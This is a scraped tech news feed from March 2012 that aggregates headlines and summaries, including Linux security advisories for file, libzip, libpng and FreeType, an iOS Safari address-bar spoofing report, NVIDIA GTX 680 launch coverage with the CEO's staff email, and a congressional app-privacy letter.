LinuxSecurity.com: Multiple out-of heap-based buffer read flaws and invalid pointer dereference flaws were found in the way file, utility for determining of file types processed header section for certain Composite Document Format (CDF) files. A remote attacker could provide a specially-crafted CDF file, which once inspected by the file utility of the victim [More...]
Channel Image07:38 Ubuntu: 1401-2: Thunderbird vulnerabilities» LinuxSecurity.com - Security Advisories
LinuxSecurity.com: Several security issues were fixed in Thunderbird.
Channel Image07:24 Mandriva: 2012:034: libzip » LinuxSecurity.com - Security Advisories
LinuxSecurity.com: Multiple vulnerabilities has been found and corrected in libzip: libzip (version <= 0.10) uses an incorrect loop construct, which can result in a heap overflow on corrupted zip files (CVE-2012-1162). [More...]
Channel Image05:00 Worth the Wait: NVIDIA's Kepler GTX Geforce 680 is New Graphics Market King» DailyTech Main News Feed
New GPU is more powerful, but also quieter, cooler; beats AMD's similar offering in price
Channel Image03:34 ISC StormCast for Friday, March 23rd 2012 http://isc.sans.edu/podcastdetail.html?id=2419, (Fri, Mar 23rd)» SANS Internet Storm Center, InfoCON: green
...(more)...
Channel Image01:38 VIDEO: Digital Magician reveals his tricks» BBC News - Technology
The cyber-illusionist who shares his magic on the web
Channel Image01:07 iTunes Movie Trailers App Updated for iPad Retina Display» MacRumors: Mac News and Rumors - Front Page
Apple has updated their iTunes Movie Trailers App with support for the new iPad's Retina Display. The trailers app mirrors the content on Apple's own Movie Trailers site and offers a good showcase of the iPad's new screen.

Here's a screen capture from Pixar's upcoming movie Brave does show a lot of detail, though it's hard to say exactly which resolution Apple is streaming.


Screenshot from Brave trailer. Click for full size.

The app works on both Wi-Fi and LTE, though if you use LTE, you may find yourself using all of your LTE bandwidth allotment rather quickly. [Direct Link]


Recent Mac and iOS Blog Stories
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1


Channel Image01:05 Cashing in on online Ponzi scams» BBC News - Technology
Investors are using web-based tracker tools to put their money into online scams in the hope of cashing out before the schemes collapse, research suggests.
Channel Image01:01 Ubuntu: 1403-1: FreeType vulnerabilities» LinuxSecurity.com - Security Advisories
LinuxSecurity.com: FreeType could be made to crash or run programs as your login if it opened aspecially crafted font file.
Channel Image01:00 Technology for small businesses - on your terms» BBC News - Technology
Technology takes the strain for small business - on their own terms
Channel Image00:34 VIDEO: Rio Ferdinand talks social media» BBC News - Technology
Manchester United and England defender Rio Ferdinand talks to Leon Mann about an agency he is helping that is teaching young footballers how to use modern media.
Channel Image00:18 Jen-Hsun's Email to NVIDIA Employees on a Successful Kepler Launch» AnandTech

The road to any new microprocessor design is by no means simple. Planning for a major GPU like NVIDIA's Kepler starts four years prior to the chip's debut. In a world that's increasingly more focused on fast production and consumption of everything, it's insane to think of any project taking such a long period of time.

Chip planning involves figuring out what you want to do, what features you want, what the architecture should look like at a high level, etc...  After several rounds of back and forth in the planning stage, actual architecture work begins. This phase can take a good 1 - 1.5 years depending on the complexity of the design. Add another year for layout and validation work, then a 6 - 9 month race from tape out to products on shelves. The teams that spend years on these designs are made up of hard working, very smart people. They all tend to believe in what they're doing and they all show up trying to do the best job possible. 

Unfortunately, picking a target that's 4 years out and trying to hit it better than your competition is extremely difficult. You can put in an amazing amount of work, push through late nights, struggle with issues, be proud of what you've done and still fall short. We've seen this happen to companies on both sides of the fence, whether we're talking CPUs or GPUs, you win some and you lose some

 

Today NVIDIA unveiled Kepler, a more efficient 28nm derivative of its Fermi architecture. The GeForce GTX 680 is the first productized Kepler for the desktop and if you read our review, it did very well. As our own Ryan Smith wrote in his conclusion to the GeForce GTX 680 review:

"But in the meantime, in the here and now, this is by far the easiest recommendation we’ve been able to make for an NVIDIA flagship video card. NVIDIA’s drive for efficiency has paid off handsomely, and as a result they have once again captured the performance crown."

We've all heard stories about what happens inside a company when a chip doesn't do well. Today we have an example of what happens after years of work really pay off. A trusted source within NVIDIA forwarded us a copy of Jen-Hsun's (NVIDIA's CEO) email to all employees, congratulating them on Kepler's launch. With NVIDIA in (presumably) good spirits today, I'm sure they won't mind if we share it here.

If you ever wondered what it's like to be on the receiving end of a happy Jen-Hsun email, here's your chance:

-----Original Message-----
From: Jensen H Huang 
Sent: Thursday, March 22, 2012 9:48 AM
To: Employees
Subject: Kepler Rising
 
Today, the first Kepler - GTX 680 - is on shelves around the world!
 
Three years in the making.  The endeavor of a thousand of the world's best engineers.  One vision - build a revolutionary GPU and make a giant leap in efficient-performance.
 
Achieving efficient-performance, great performance while consuming the least possible energy, required us to change our entire design approach.  Close collaboration between architecture-design-VLSI-software-devtech-systems, intense scrutiny on where energy is spent, and inventions at every level were necessary.  The results are fantastic as you will see in the reviews. 
 
Kepler also cultivated a passion for craftsmanship - nothing wasted, everything put together with care - with a goal of creating an exquisite product that works wonderfully.  Let's continue to raise the bar and establish extraordinary craftsmanship as a hallmark of our company.
 
Today is just the beginning of Kepler.  Because of its super energy-efficient architecture, we will extend GPUs into datacenters, to super thin notebooks, to superphones.  Not to mention bring joy and delight to millions of gamers around the world.
 
I want to thank all that gave your heart and soul to create Kepler.  You've created something wonderful.
 
Congratulations everyone!
 
Jensen

 

Channel Image00:00 Yesterday (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Jusqu'où irez-vous pour découvrir qui est John et ce qu'il a fait Yesterday ?


Channel Image00:00 YUMI (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Transformez vos clés USB en couteaux suisses "bootables"


Channel Image00:00 Windows 8 Codecs (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Codecs pour profiter de presque tous les formats vidéos sous Windows 8


Channel Image00:00 WinMate (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Nettoyez, réparez et optimisez votre système


Channel Image00:00 Total War : SHOGUN 2 - La Fin des Samouraïs (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Aidez le Japon à entrer dans l'ère modern


Channel Image00:00 Thème pour Windows 7 : Xbox Skin Pack (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Offrez un look acidulé à votre Windows 7


Channel Image00:00 SterJo Task Manager Portable (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Surveille et gère les processus et drivers de votre ordinateur


Channel Image00:00 SterJo Task Manager (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Surveille et gère les processus et drivers de votre ordinateur


Channel Image00:00 SterJo Key Finder Portable (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Récupère les clés produits de vos applications Windows et Office


Channel Image00:00 SterJo Key Finder (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Récupère les clés produits de vos applications Windows et Office


Channel Image00:00 ServiceTray (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Surveillez vos différents services et gérez-les directement depuis la zone de notification


Channel Image00:00 Quick Pop Menu (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Accédez aux raccourcis de votre choix depuis un menu contextuel alternatif


Channel Image00:00 Need for Speed World (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Parcourez l'univers de Need For Speed dans ce jeu de courses massivement multijoueur en 3D


Channel Image00:00 Key Remapper (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Modifiez les fonctions de certaines touches du clavier


Channel Image00:00 JDAutoSpeedTester (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Testez votre connexion Internet à la recherche de bridage ou de problèmes de pertes de paquets


Channel Image00:00 Geosense for Windows (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Système de géolocalisation pour Windows 7


Channel Image00:00 File Recovery Assist (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Récupère la plupart de vos données sur un disque dur ou clé USB


Channel Image00:00 EDraw Office Viewer Component (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Hébergez vos documents Office au sein d'un formulaire ou d'une page Web


Channel Image00:00 Drawn : Sur la Piste des Ombres (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Rejoignez un univers magique de peintures et de fééries où l'inspiration et le rêve s'unissent pour lutter contre le mal


Channel Image00:00 Dark Parables : La Reine des Neiges Edition Collector (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Voyagez dans le mythique Royaume des montagnes


Channel Image00:00 ComicRack (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Un lecteur et un gestionnaire d'eComics


Channel Image00:00 Calibre (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour linux
Gérez votre bibliothèque de livres électroniques


Channel Image00:00 Bookmark Notes pour Internet Explorer (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Ajoutez des commentaires et des notes à vos favoris Internet Explorer


Channel Image00:00 Ashampoo 3D CAD Architecture (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour windows
Créez des plans et des vues en 3D de vos projets de construction et d'ameublement


Channel Image00:00 1Keyboard (23/03/2012)» 01net. Telecharger.com - Les nouveaux téléchargements pour mac
Utilisez le clavier de votre Mac pour rédiger du texte sur vos iDevices


Thu 22 March, 2012

Channel Image21:30 Alternative GOP Budget Would Chop Auto Loans and High-Speed Railway Funding» DailyTech Main News Feed
Budget proposal would kill Obama's green plans
Channel Image20:28 New iPad Launching in 25 More Countries on Friday» MacRumors: Mac News and Rumors - Front Page

New Zealand line photo by @SiobhanKeoghNZ

As a reminder for our international readers, the new iPad will be on sale in 25 more countries starting tomorrow, Friday March 23. In fact, it's currently on sale in New Zealand, where it's already tomorrow.
Starting March 23 the new iPad will be available in Austria, Belgium, Bulgaria, Czech Republic, Denmark, Finland, Greece, Hungary, Iceland, Ireland, Italy, Liechtenstein, Luxembourg, Macau, Mexico, The Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Slovakia, Slovenia, Spain and Sweden.
The 3rd Generation iPad launched in 10 countries including the U.S. last Friday and is now expanding further internationally. The iPad is available for online order with 1-2 week delivery delays.


Recent Mac and iOS Blog Stories
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1
iPhone 4S Mod Adds Real Flashlight to Headphone Jack


Channel Image19:53 Address Bar Security Issue Found in iOS 5.1 Safari» MacRumors: Mac News and Rumors - Front Page
A security firm has discovered a security issue in the iOS 5.1 version of MobileSafari, the most recent version of the operating system that runs on millions of Apple mobile devices. The behavior was discovered and detailed by David Vieira-Kurz of MajorSecurity.net.
The weakness is caused due to an error within the handling of URLs when using javascript's window.open() method. This can be exploited to potentially trick users into supplying sensitive information to a malicious web site, because information displayed in the address bar can be constructed in a certain way, which may lead users to believe that they're visiting another web site than the displayed web site.

To test it out, visit this demo page on an iPhone, iPod Touch or iPad running iOS 5.1. Click the 'Demo' button and MobileSafari will open a new window displaying "www.apple.com" in the address bar, though it's actually loading a page from MajorSecurity.net.

The security firm does note that Apple was informed of the vulnerability three weeks ago, and it is only being made public today. Apple acknowledged the bug and should be pushing a fix soon.


Recent Mac and iOS Blog Stories
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1
iPhone 4S Mod Adds Real Flashlight to Headphone Jack
Hipstamatic and Instagram Link Up in Photo Sharing Partnership


Channel Image19:38 Debian: 2439-1: libpng: buffer overflow» LinuxSecurity.com - Security Advisories
LinuxSecurity.com: Glenn-Randers Pehrson discovered an buffer overflow in the libpng PNG library, which could lead to the execution of arbitrary code if a malformed image is processed. [More...]
Channel Image19:33 Le Conseil constitutionnel censure le « fichier des honnêtes gens »» 01net. Actualités
EN BREF. Les opposants au fichier biométrique centralisé respirent. Dans un avis publié aujourd'hui, les Sages ont déclaré anticonstitutionnels plusieurs articles de la loi relative à la protection de l'identité.


Channel Image19:19 3/22/2012 Daily Hardware Reviews -- NVIDIA GeForce GTX 680 Edition» DailyTech Main News Feed
DailyTech's roundup of hardware reviews from around the web for Thursday
Channel Image19:17 Congressmen Send Inquiries to 34 App Developers Over Privacy Practices» MacRumors: Mac News and Rumors - Front Page
Representatives Henry A. Waxman (D-CA) and G.K. Butterfield (D-NC) have sent letters to thirty-four app developers with a number of questions about their information collection and use practices. This follows on a letter from the Congressmen sent to Apple requesting information on the company's data collection policies it imposes on App Store developers.

The letters were sent to a wide variety of developers, and were selected by the Representatives on the basis of "their inclusion in the “Social Networking” subcategory within the “iPhone Essentials” area of Apple’s App Store." They include Turntable.FM, Twitter, Tweetbot, Path, Instagram, Facebook, and Apple itself.

Last month, a developer of applications ("apps") for Apple's mobile devices discovered that the social networking app Path was accessing and collecting the contents of his iPhone address book without having asked for his consent. Following the reports about Path, developers and members of the press ran their own small-scale tests of the code for other popular apps for Apple's mobile devices to determine which were accessing address book information. Around this time, three other apps released new versions to include a prompt asking for users' consent before accessing the address book. In addition, concerns were subsequently raised about the manner in which apps can access photographs on Apple's mobile devices.

We are writing to you because we want to better understand the information collection and use policies and practices of apps for Apple's mobile devices with a social element. We request that you respond to the following questions:

(1) Through the end of February 2012, how many times was your iOS app downloaded from Apple's App Store?

(2) Did you have a privacy policy in place for your iOS app at the end of February 2012? If so, please tell us when your iOS app was first made available in Apple's App Store and when you first had a privacy policy in place. In addition, please describe how that policy is made available to your app users and please provide a copy of the most recent policy.

(3) Has your iOS app at any time transmitted information from or about a user's address book? If so, which fields? Also, please describe all measures taken to protect or secure that information during transmission and the periods of time during which those measures were in effect.

(4) Have you at any time stored information from or about a user's address book? If so, which field? Also, please describe all measures taken to protect or secure that information during storage and the periods of time during which those measures were in effect.

(5) At any time, has your iOS app transmitted or have you stored any other information from or about a user's device - including, but not limited to, the user's phone number, email account information, calendar, photo gallery, WiFi connection log, the Unique Device Identifier (UDID), a Media Access Control (MAC) address, or any other identifier unique to a specific device?

(6) To the extent you store any address book information or any of the information in question 5, please describe all purposes for which you store or use that information, the length of time for which you keep it, and your policies regarding sharing of that information.

(7) To the extent you transmit or store any address book information or any of the information in question 5, please describe all notices delivered to uscrs on the mobile device screen about your collection and use practices both prior to and after February 8, 2012.

(8) The iOS Developer Program License Agreement detailing the obligations and responsibilities of app developers reportedly states that a developer and its applications "may not collect user or device data without prior user consent, and then only to provide a service or function that is directly relevant to the use of the Application, or to serve advertising.";

(a) Please describe all data available from Apple mobile devices that you understand to be user data requiring prior consent from the user to be collected.

(b) Please describe all data available from Apple mobile devices that you understand to be device data requiring prior consent from the user to be collected.

(c) Please describe all services or functions for which user or device data is directly relevant to the use of your application.

(9) Please list all industry self-regulatory organizations to which you belong.
The developers are given until April 12, 2012 to respond.


Recent Mac and iOS Blog Stories
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1
iPhone 4S Mod Adds Real Flashlight to Headphone Jack
Hipstamatic and Instagram Link Up in Photo Sharing Partnership


Channel Image19:13 Free Mobile : et si la tendance s'inversait ?» 01net. Actualités
EN BREF. Selon Didier Casas, secrétaire général de Bouygues Telecom, 49 % des abonnement B&You enregistrés au 21 mars proviennent de clients de Free Mobile.


Channel Image18:48 Orange et Bouygues : premiers déploiements 4G dès juin 2012» 01net. Actualités
Les deux opérateurs ont détaillé ce 22 mars leurs plans pour le HSPA+ et la 4G, dont le lancement est prévu au début 2013. En attendant, Lyon et Marseille serviront de villes pilotes, dès le mois de juin.


Channel Image18:45 Dossier GeForce GTX 680 finalisé» HardWare.fr
Channel Image18:34 Amiga launches a $2,500 quad-core lunchbox PC» Home - THE INQUIRER

1980s brand carries 1980s pricing



Channel Image18:13 Sony's 'Music Unlimited' On Demand Music Service Coming to iOS» MacRumors: Mac News and Rumors - Front Page
TechRadar reports that Sony is bringing their Music Unlimited service to iOS devices "in the coming weeks".
"We will be launching our music service on iOS in the next few weeks," said Layden, who was speaking at the IP&TV World Forum with TechRadar in attendance.

"We want to be on as many devices for users who want to be part of Music Unlimited."
Music Unlimited is Sony's on-demand all you can listen to music service that costs $9.99 a month. Sony claims to have a global catalog of over 10 million songs that you can listen to on your computer, Android phone, Sony Enabled device, and soon, iOS device. They offer unlimited skips and no ads for the paid service.


Perhaps most interesting is that on the Android version they've introduced offline playback. Users can download their Music Unlimited playlists to their devices and play them even without a wireless signal.


Recent Mac and iOS Blog Stories
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1
iPhone 4S Mod Adds Real Flashlight to Headphone Jack
Hipstamatic and Instagram Link Up in Photo Sharing Partnership
Google Earth for iOS Update Adds Support for KML Files


Channel Image18:02 Nvidia launches 28nm Kepler GPU with the Geforce GTX680» Home - THE INQUIRER

Mobile Kepler simmers until Ivy Bridge launch



Channel Image17:51 Microsoft expects 10in 2560x1400 Windows 8 tablets» Home - THE INQUIRER

Will surpass Apple's lead, it claims



Channel Image17:44 Lucid DynamiX pour Skyrim» HardWare.fr
Channel Image17:40 Reportage Sony (7/8) : le design ou la bataille des détails» 01net. Actualités
Dans un showroom des locaux tokyoïtes de Sony, un designer nous laisse entrevoir le défi que représente le design d'un produit. Entre choix des formes, des matériaux et des process... les détails font la différence.


Channel Image17:32 Talk Talk is the most complained about UK telecom» Home - THE INQUIRER

Enough with the talking



Channel Image17:16 MIT camera can 'see around corners'» Latest Articles

MIT researchers have developed a camera system that uses reflected laser light to 'see' and build 3D images of objects that are out of line-of-sight

(ZDNet UK - Emerging Tech)

Channel Image17:14 Mise à jour Android 4.0 en avril pour les Sony Tablet P et S» ZDNet News
Cette mise à jour s'accompagnera de nouvelles fonctionnalités, liées notamment à l'appareil photo. Une version WiFi de la Tablet P sortira le 21 avril au Japon.
Channel Image16:50 New iPad Notes: Battery Charging at 100%, Safari Scaling Images» MacRumors: Mac News and Rumors - Front Page
A couple of new findings as people spend more time with their new iPads. First, iLounge reports on findings by DisplayMate on the new iPads charging behavior. It turns out the iPad continues to charge for as long as an hour after it says its at 100%, suggesting the on-screen indicator isn't quite accurate and may still need more charging.
In an email exchange with iLounge, DisplayMate President Ray Soneira indicated that the third-generation iPad—when connected to power via the included Apple 10W Power Adapter—actually continued to draw 10W of power for up to one hour after reaching what is reported by iOS as a full 100% charge
iLounge found in their battery testing of the new iPad that sometimes the charge would drop initially quickly when they thought the iPad was fully charged.

Earlier in the week, Tom's Hardware noticed that Safari on the new iPad was automatically scaling large images down significantly.


Large images were automatically scaled down to near 1 megapixel resolutions. This means that if you are viewing large images through Safari, you aren't getting the full Retina experience. A workaround mentioned is to save the image to Photos which seems to preserve the original resolution.

These findings were confirmed by web developer Duncan Davidson who ran into the limit when trying to enhance his websites with Retina-sized images.


Recent Mac and iOS Blog Stories
Hipstamatic and Instagram Link Up in Photo Sharing Partnership
Google Earth for iOS Update Adds Support for KML Files
Propellerhead Software Demos 'Figure' - An Upcoming iOS Music App Inspired by Reason
Some Users Seeing Poor Wi-Fi Reception on New iPad
iPad LTE Makes it Far Easier to Use Up Bandwidth Allotments


Channel Image16:48 Iceland swaps Windows for Linux in open-source push» Latest Articles

The country is making headway on a pilot scheme to move public-sector bodies from proprietary to free and open-source software, though Oracle and other products could create hurdles

(ZDNet UK - Business of IT)

Channel Image16:20 Terrorisme : Nicolas Sarkozy veut pénaliser la consultation de sites Internet» ZDNet News
Suite à la tragédie de Toulouse et à l’assassinat de plusieurs militaires par un individu se réclamant d’Al-Qaïda, le président et candidat à la présidentielle annonce de nouvelles mesures, dont des sanctions pénales contre les internautes consultant de « manière habituelle » des sites faisant l’apologie du terrorisme. Juridiquement et techniquement, Nicolas Sarkozy va sans doute vite en besogne.
Channel Image16:20 Globalfoundries ships 250,000 32nm wafers» Home - THE INQUIRER

AMD claims support for its 28nm process node



Channel Image16:15 Red Hat: 2012:0411-01: openoffice.org: Important Advisory» LinuxSecurity.com - Security Advisories
LinuxSecurity.com: Updated openoffice.org packages that fix one security issue are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having [More...]
Channel Image16:10 Adobe Releases Photoshop CS6 Beta for Free Download» DailyTech Main News Feed
CS6 will launch in H1 2012, price undetermined
Channel Image16:04 Adobe Photoshop CS 6 disponible gratuitement en bêta» 01net. Actualités
EN BREF. Envie de découvrir les nouveautés du plus célèbre logiciel de retouche d'images ? Depuis ce jeudi 22 mars, Adobe propose gratuitement une version bêta de Photoshop CS6 en téléchargement.


Channel Image16:03 Red Hat: 2012:0410-01: raptor: Important Advisory» LinuxSecurity.com - Security Advisories
LinuxSecurity.com: Updated raptor packages that fix one security issue are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having [More...]
Channel Image16:02 e-Education : le gouvernement sélectionne 10 projets de recherche et développement» ZDNet News
Ils ont été désignés dans le cadre de l'appel à projets "Technologies de l'e-éducation" lancé en janvier 2011. Retenus en raison de leur caractère innovant et de leurs perspectives économiques, ils bénéficieront d'une aide de 8,3 millions d'euros.
Channel Image15:58 RIM's BlackBerry Loses Top Spot to iPhone in its Home Canadian Market» MacRumors: Mac News and Rumors - Front Page

Bloomberg reports that Apple's iPhone surpassed RIM's BlackBerry as the number one in Canadian smartphone shipments in 2011. RIM is based in Canada and has had strong loyalty amongst its customers.
RIM, based in Waterloo, Ontario, shipped 2.08 million BlackBerrys last year in Canada, compared with 2.85 million units for Apple, data compiled by IDC and Bloomberg show. In 2010, the BlackBerry topped the iPhone by half a million, and in 2008, the year after the iPhone’s debut, RIM outsold Apple by almost five to one.
RIM has been on a decline since the launch of the iPhone and Android platforms with sales and profits dropping. RIM's worldwide numbers have been dropping precipitously in contrast to significant grown from iOS and Android.


Recent Mac and iOS Blog Stories
Hipstamatic and Instagram Link Up in Photo Sharing Partnership
Google Earth for iOS Update Adds Support for KML Files
Propellerhead Software Demos 'Figure' - An Upcoming iOS Music App Inspired by Reason
Some Users Seeing Poor Wi-Fi Reception on New iPad
iPad LTE Makes it Far Easier to Use Up Bandwidth Allotments


Channel Image15:55 Iceland’s public sector IT moves towards open source» Home - THE INQUIRER

All of Iceland's public administration is on the move



Channel Image15:54 La Chine devient n°1 mondial des activations iOS et Android» 01net. Actualités
Une étude classe la Chine en tête des activations d'OS mobiles. Si pour le moment, iOS et Android se partagent le marché, Microsoft veut une place pour Windows Phone.


Channel Image15:30 iPhone 5 : finalement un écran plus grand ?» 01net. Actualités
A peine le nouvel iPad débarqué que la machine à rumeurs repart de plus belle. Cette fois-ci, c'est l'iPhone 5 qui est sous les feux de la rampe, avec un écran, donc un form factor, qui serait plus grand...


Channel Image15:30 Microsoft Talks Screen Resolution in Windows 8, Suggests "Retina"-esque Tablets» AnandTech

Microsoft's David Washington has penned another informational tome on the Building Windows 8 blog, this one about Windows 8 and its support for varying screen resolutions. The above chart lists the common (but not the only) resolutions that Microsoft is planning for, and while most of the listed display types won't surprise anyone (wall-to-wall 1366x768 and 1920x1080 for most desktops and laptops), it does appear as though Microsoft is planning for Windows tablets with a DPI that approaches or matches that of the new iPad.

Microsoft is planning for tablets that use both the 1024x768 and 1366x768 resolutions common in earlier and lower-end tablets as well as the high-DPI screens that are being (and will be) ushered in by the new iPad. To scale Windows elements so that they're still comfortable to look at and touch at these resolutions, Microsoft has put together some pre-defined scaling percentages: 100% when no scaling is applied, 140% for 1080p tablets, and 180% for quad-XGA tablets like the new iPad. These percentages were all chosen as "pixel density sweet spots" for 10" and 11" tablets with 1920x1080 or 2560x1440 displays. It should be noted that Washington's blog post focused entirely on Metro scaling - whether the Windows desktop will automatically scale using these percentages is unclear.

Microsoft's attention to these specific resolutions suggests that we will probably see some high-DPI Windows tablets when they launch in the fall, though we still don't know anything about the tablets OEMs are designing for Windows 8 and Windows on ARM. It's also telling that there are no 7" tablets on that chart - we may not see Windows versions of smaller tablets like the Kindle Fire or Nook Tablet.

Washington went on to explain the reasoning behind the minimum resolution requirements for Metro apps that we noticed in our Windows 8 preview review - 1024x768 for Metro apps and 1366x768 for the Metro Snap feature. Both choices were largely developer and data-driven: 1024x768 is a common low-end resolution for web developers and tablet app developers, and Microsoft didn't want to restrict these developers to a lower minimum resolution to account for the small percentage of 800x600 and 1024x600 displays that are currently in use.

As for snapped apps: the size for a "snapped" app is always 320 pixels wide, which was again selected because developers have become used to it in their work with smartphones. A 1366x768 display is the lowest common screen resolution that allows for the 320 pixel width and the 1024 pixel minimum width for regular Metro apps.

Also discussed was the methods by which Metro allows programs to expand to take up all of the pixels in a larger laptop or desktop display: To help dynamically expand content to take up more screen space when the pixels are available, Windows 8 uses the same XAML and CSS3 features that are commonly used to accomplish this on modern web pages - examples of such features include the grid, flexible box, and multi-column CSS3 layouts. App templates provided with Visual Studio 11 all make use of these features automatically. Developers can also scale their apps to fit larger displays, which is useful for games or other apps that don't need to make use of additional pixels.

For more, including Windows 8's support for scalable graphics and the Windows Simulator tool that will provide Visual Studio 11 users the ability to test their apps at multiple screen resolutions, the full post is linked below for your convenience.

Source: Building Windows 8 blog

Channel Image15:28 Mise à jour des PC HardWare.fr !» HardWare.fr
Channel Image15:22 Apple Patent Shows Self Configuring iPhone as a Universal TV Remote» MacRumors: Mac News and Rumors - Front Page
Apple patent applications tend to cover a broad set of topics, including many research items that never make their way out of the labs. A new one found this morning, however, is more interesting than usual given the recent rumors of an Apple television.

The application is titled "Configurable Remote Control" and is detailed by PatentlyApple.


In the application, Apple describes the use of the iPhone as a self-configuring universal remote for your home entertainment system. Specifically, they suggest using the iPhone's camera to take a photo of your existing remote, and then comparing that photo to a database of known remotes.
The method may begin by obtaining an input that may be used to identify the electronic device that is to be controlled, such as by using image processing techniques to compare the captured image against a database of known devices.
Apple acknowledges the iPhone in question would also need IR transmission capabilities. The patent application is dated from 2010.

Apple has been widely expected to use voice-recognition in their rumored Apple Television. As with many patent applications, we don't necessarily think this concept will make its way into production. Still, it shows Apple's research interests into home entertainment systems and seems relevant given the ongoing rumors of a Apple TV set.



Recent Mac and iOS Blog Stories
Hipstamatic and Instagram Link Up in Photo Sharing Partnership
Google Earth for iOS Update Adds Support for KML Files
Propellerhead Software Demos 'Figure' - An Upcoming iOS Music App Inspired by Reason
Some Users Seeing Poor Wi-Fi Reception on New iPad
iPad LTE Makes it Far Easier to Use Up Bandwidth Allotments


Channel Image15:10 Acer Unveils Iconia Tab A510 Tablet with Quad Core Performance» DailyTech Main News Feed
Tablet is up for pre-order today
Channel Image14:55 Crash Victim Opts Amputation, Robotic Replacement Hand» DailyTech Main News Feed
Elective amputation is very groundbreaking, controversial
Channel Image14:55 Commodore Releases Amiga Mini, Updates Other Models » DailyTech Main News Feed
Amiga is officially making its comeback in the form of a high-end gaming PC in a small package called the Amiga Mini
Channel Image14:30 Dossier: Nvidia GeForce GTX 680 en test» HardWare.fr
Channel Image14:25 Google foresees weather-based ads» BBC News - Technology
In a nod to sci-fi film Minority Report, Google wins patent for personalised ads based on environmental conditions.
Channel Image14:02 Debian: 2438-1: raptor: programming error» LinuxSecurity.com - Security Advisories
LinuxSecurity.com: It was discovered that Raptor, a RDF parser and serializer library, allows file inclusion through XML entities, resulting in information disclosure. [More...]
Channel Image14:00 Waterfox, the 64bit Firefox, is not in beta» Home - THE INQUIRER

Mistake in the release matrix



Channel Image14:00 Waterfox, the 64-bit Firefox, is not in beta» Home - THE INQUIRER

Mistake in the release matrix

Channel Image14:00 NVIDIA GeForce GTX 680 Review: Retaking The Performance Crown» AnandTech

“How do you follow up on Fermi?” That’s the question we had going into NVIDIA’s press briefing for the GeForce GTX 680 and the Kepler architecture earlier this month. With Fermi NVIDIA not only captured the performance crown for gaming, but they managed to further build on their success in the professional markets with Tesla and Quadro. Though it was a very clearly a rough start for NVIDIA, Fermi ended up doing quite well in the end.

So how do you follow up on Fermi? As it turns out, you follow it up with something that is in many ways more of the same. With a focus on efficiency, NVIDIA has stripped Fermi down to the core and then built it back up again; reducing power consumption and die size alike, all while maintaining most of the aspects we’ve come to know with Fermi. The end result of which is NVIDIA’s next generation GPU architecture: Kepler.

Launching today is the GeForce GTX 680, at the heart of which is NVIDIA’s new GK104 GPU, based on their equally new Kepler architecture. As we’ll see, not only has NVIDIA retaken the performance crown with the GeForce GTX 680, but they have done so in a manner truly befitting of their drive for efficiency.

Channel Image14:00 GeForce GTX 680 2 GB Review: Kepler Sends Tahiti On Vacation» Reviews Tom's Hardware US
GeForce GTX 680 2 GB Review: Kepler Sends Tahiti On VacationEnthusiasts want to know about Nvidia's next-generation architecture so badly that they broke into our content management system and took the data to be used for today's launch. Now we can really answer how Kepler fares against AMD's GCN architecture.
Channel Image13:59 NVIDIA's GeForce 600M Series: Mobile Kepler and Fermi Die Shrinks» AnandTech

While the desktop-bound GeForce GTX 680 is undoubtedly the most exciting release from NVIDIA today and the true flagbearer for their new Kepler microarchitecture, NVIDIA actually has a whole host of releases ready to go on the notebook front. We've already had a chance to check out the GeForce GT 640M in action, but it's far from the only member of the old/new GeForce 600M series. Today we have details on their complete 600M series from top to bottom; some of it is exciting and new, and some of it is just the GPU industry up to its same old marketing tricks. Read on for the full details.

Channel Image13:49 Broadcom buys Broadlight for $195m» Home - THE INQUIRER

Sees the light



Channel Image13:45 Hacktivists 'stealing most data'» BBC News - Technology
In 2011, hacktivists stole more data from large corporations than cyber criminals, reveals a study of security incidents.
Channel Image13:39 250000 wafers 32nm pour GlobalFoundries» HardWare.fr
Channel Image13:35 Samsung Note gets upgraded to Android 4.0» Home - THE INQUIRER

Spring brings Ice Cream Sandwich



